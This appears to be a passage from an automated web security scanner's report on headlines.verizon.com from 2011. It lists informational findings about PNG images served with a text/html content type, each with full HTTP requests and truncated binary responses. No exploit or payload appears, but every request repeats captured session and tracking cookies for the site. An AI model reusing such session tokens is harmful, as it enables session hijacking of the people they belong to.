NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 368
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...&..........G......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.... .0...t.;B;..AG....:......PWp.f.G....H..` ....%g....O...(..S `......VU......~..B-...w...... /.| ..r..
...[SNIP]...

24.17. http://headlines.verizon.com/headlines/resources/images/navOff_03.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_03.png

Request

GET /headlines/resources/images/navOff_03.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 543
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...:............e....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.m.0............d..!....#.#.+..G(#..^zY$...*./Y.......Q..R..../b.h&...o{...u]..0..cK]Em...........V..
...[SNIP]...

24.18. http://headlines.verizon.com/headlines/resources/images/navOff_04.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_04.png

Request

GET /headlines/resources/images/navOff_04.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 556
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...B.........tKJ ....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.m.@.M..@G...
d.2B..F......a.0B....>K....i../[....?xg.`....i.zs......p ...3..,......p.M..Z3.{.g.....t#
...[SNIP]...

24.19. http://headlines.verizon.com/headlines/resources/images/navOff_05.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_05.png

Request

GET /headlines/resources/images/navOff_05.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 574
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...;.........~..[....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V.m. ..U..#..................f.FhV`...zD'....O.....q......zU.........-`.W{_........{'..}...l!.w[#..mG..
...[SNIP]...

24.20. http://headlines.verizon.com/headlines/resources/images/navOff_06.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_06.png

Request

GET /headlines/resources/images/navOff_06.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 547
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...A..........|.
....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W...0.MO]..X..`.t...F..`.F(#.+0B........D....l...q0..9.i.6.....).
... <....UU....}?;.........&.%.-....
...[SNIP]...

24.21. http://headlines.verizon.com/headlines/resources/images/navOff_07.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_07.png

Request

GET /headlines/resources/images/navOff_07.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 503
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...:............e....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W...0..S....
Y!7.+..0...FhF(#...#.#pv.|.Yp.....K..qB^....4M.+.[."..F......_@Y..=....m.......Av..|.'..;Y
...[SNIP]...

24.22. http://headlines.verizon.com/headlines/resources/images/navOff_08.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_08.png

Request

GET /headlines/resources/images/navOff_08.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 441
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...0.................gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...KIDATx..V.m. ......+..v.;..PG.#.... +..+0../.....V.._.%/ ...qGT....l/..[....w..[.]...Z1.....,...=.mY'...m..n.8.
...[SNIP]...

24.23. http://headlines.verizon.com/headlines/resources/images/navOn_01.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOn_01.png

Request

GET /headlines/resources/images/navOn_01.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 1288
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...S..........'......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..WKo.H..;.8.L.a..J.j.. .w$.'.8.'V .....C.IPx.x\ 7..!n....V".....DrA+m..0....c.....=.{C .=....].U_U.c[.
...[SNIP]...

24.24. http://headlines.verizon.com/headlines/resources/images/pageTitleHeadlines.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/pageTitleHeadlines.png

Request

GET /headlines/resources/images/pageTitleHeadlines.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:26 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 929
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...a.........5..N....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...3IDATx..W..!A.]JBHHH*...T*..7..PJ(......r....s...u....Z.......jv.w......8.....x<z.W(......v...{.r.\6....RI}<..
...[SNIP]...

24.25. http://headlines.verizon.com/headlines/resources/images/primaryNavPipe.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/primaryNavPipe.png

Request

GET /headlines/resources/images/primaryNavPipe.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:17:16 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 193
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...............M.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...SIDATx.b...?....={VDJJ....a...1... cpcH...?...L..C....... .. &..3....o@...x.z....0..-..........IEND.B`.

24.26. http://headlines.verizon.com/headlines/resources/images/twit_pipe.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/twit_pipe.png

Request

GET /headlines/resources/images/twit_pipe.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
